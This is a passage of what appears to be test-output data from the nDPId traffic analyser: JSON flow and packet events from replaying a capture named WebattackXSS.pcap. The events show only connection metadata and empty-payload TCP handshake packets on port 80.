{"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347575652,"flow_last_seen":1499347580775,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58664,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347578164,"flow_last_seen":1499347583775,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58690,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347578164,"flow_last_seen":1499347583775,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58690,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347579405,"flow_last_seen":1499347584775,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58704,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347579405,"flow_last_seen":1499347584775,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58704,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347580693,"flow_last_seen":1499347585776,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58718,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347580693,"flow_last_seen":1499347585776,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58718,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347583209,"flow_last_seen":1499347588776,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58744,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347583209,"flow_last_seen":1499347588776,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58744,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347712277,"flow_last_seen":1499347712277,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347712277,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60134,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":439,"flow_packet_id":1,"flow_last_seen":1499347712277,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347712277,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8nw9AAD4GJsGsEAABwKgKMurmAFCpjSAeAAAAAKACchDp1AAAAgQFtAQCCAoBO78RAAAAAAEDAwc="} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347712277,"flow_last_seen":1499347712277,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347712277,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":440,"flow_packet_id":1,"flow_last_seen":1499347712277,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347712277,"pkt":"ABm5CmnxAMGxFOsxCABFAAA81Z1AAD4G8DKsEAABwKgKMuroAFDnlWqMAAAAAKACchBhXAAAAgQFtAQCCAoBO78RAAAAAAEDAwc="} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6219,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":440,"flow_packet_id":2,"flow_last_seen":1499347712277,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347712277,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6ui8Jpzg55VqjaAScSB0yAAAAgQFtAQCCAoD5ZCGATu\/EQEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6220,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":439,"flow_packet_id":2,"flow_last_seen":1499347712277,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347712277,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6uYE2QpnqY0gH6AScSBHCAAAAgQFtAQCCAoD5ZCGATu\/EQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6221,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":440,"flow_packet_id":3,"flow_last_seen":1499347712277,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347712277,"pkt":"ABm5CmnxAMGxFOsxCABFAAA01Z5AAD4G8DmsEAABwKgKMuroAFDnlWqNvCac4YAQAOUTzwAAAQEICgE7vxID5ZCG"} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6222,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":439,"flow_packet_id":3,"flow_last_seen":1499347712277,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347712277,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0nxBAAD4GJsisEAABwKgKMurmAFCpjSAfBNkKaIAQAOXmDgAAAQEICgE7vxID5ZCG"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6229,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347713588,"flow_last_seen":1499347713588,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347713588,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60154,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6229,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":441,"flow_packet_id":1,"flow_last_seen":1499347713588,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347713588,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8P+JAAD4Ghe6sEAABwKgKMur6AFB3+v+7AAAAAKACchA6bgAAAgQFtAQCCAoBO8BZAAAAAAEDAwc="} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6230,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":441,"flow_packet_id":2,"flow_last_seen":1499347713588,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347713588,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6vp4zY2Qd\/r\/vKAScSCfOwAAAgQFtAQCCAoD5ZHOATvAWQEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":441,"flow_packet_id":3,"flow_last_seen":1499347713589,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347713589,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0P+NAAD4GhfWsEAABwKgKMur6AFB3+v+8eM2NkYAQAOU+QwAAAQEICgE7wFkD5ZHO"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6247,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347716243,"flow_last_seen":1499347716243,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347716243,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60180,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6247,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":442,"flow_packet_id":1,"flow_last_seen":1499347716243,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347716243,"pkt":"ABm5CmnxAMGxFOsxCABFAAA821BAAD4G6n+sEAABwKgKMusUAFBsBhmhAAAAAKACchApywAAAgQFtAQCCAoBO8LxAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6248,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":442,"flow_packet_id":2,"flow_last_seen":1499347716243,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347716243,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6xT1wuHkbAYZoqAScSC6tgAAAgQFtAQCCAoD5ZRmATvC8QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6249,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":442,"flow_packet_id":3,"flow_last_seen":1499347716244,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347716244,"pkt":"ABm5CmnxAMGxFOsxCABFAAA021FAAD4G6oasEAABwKgKMusUAFBsBhmi9cLh5YAQAOVZvgAAAQEICgE7wvED5ZRm"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6256,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347717533,"flow_last_seen":1499347717533,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347717533,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60194,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6256,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":443,"flow_packet_id":1,"flow_last_seen":1499347717533,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347717533,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8GKhAAD4GrSisEAABwKgKMusiAFDZTNycAAAAAKACchD4NwAAAgQFtAQCCAoBO8Q0AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6257,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":443,"flow_packet_id":2,"flow_last_seen":1499347717533,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347717533,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6yL+myOL2UzcnaAScSA9YgAAAgQFtAQCCAoD5ZWoATvENAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6258,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":443,"flow_packet_id":3,"flow_last_seen":1499347717534,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347717534,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0GKlAAD4GrS+sEAABwKgKMusiAFDZTNyd\/psjjIAQAOXcaQAAAQEICgE7xDQD5ZWo"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6280,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347720094,"flow_last_seen":1499347720094,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720094,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60220,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6280,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":444,"flow_packet_id":1,"flow_last_seen":1499347720094,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347720094,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8qt5AAD4GGvKsEAABwKgKMus8AFAqiGxqAAAAAKACchAUlQAAAgQFtAQCCAoBO8a0AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6281,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":444,"flow_packet_id":2,"flow_last_seen":1499347720095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347720095,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6zwJv9VKKohsa6AScSCaWwAAAgQFtAQCCAoD5ZgpATvGtAEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6282,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":444,"flow_packet_id":3,"flow_last_seen":1499347720095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347720095,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0qt9AAD4GGvmsEAABwKgKMus8AFAqiGxrCb\/VS4AQAOU5YwAAAQEICgE7xrQD5Zgp"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347584472,"flow_last_seen":1499347589778,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58758,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347584472,"flow_last_seen":1499347589778,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58758,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347585744,"flow_last_seen":1499347590777,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58772,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347585744,"flow_last_seen":1499347590777,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58772,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347588270,"flow_last_seen":1499347593778,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58798,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347588270,"flow_last_seen":1499347593778,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58798,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347589555,"flow_last_seen":1499347594779,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58812,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347589555,"flow_last_seen":1499347594779,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58812,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347592060,"flow_last_seen":1499347597780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58838,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347592060,"flow_last_seen":1499347597780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58838,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347593330,"flow_last_seen":1499347598782,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58852,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347593330,"flow_last_seen":1499347598782,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58852,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347594595,"flow_last_seen":1499347599780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58866,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 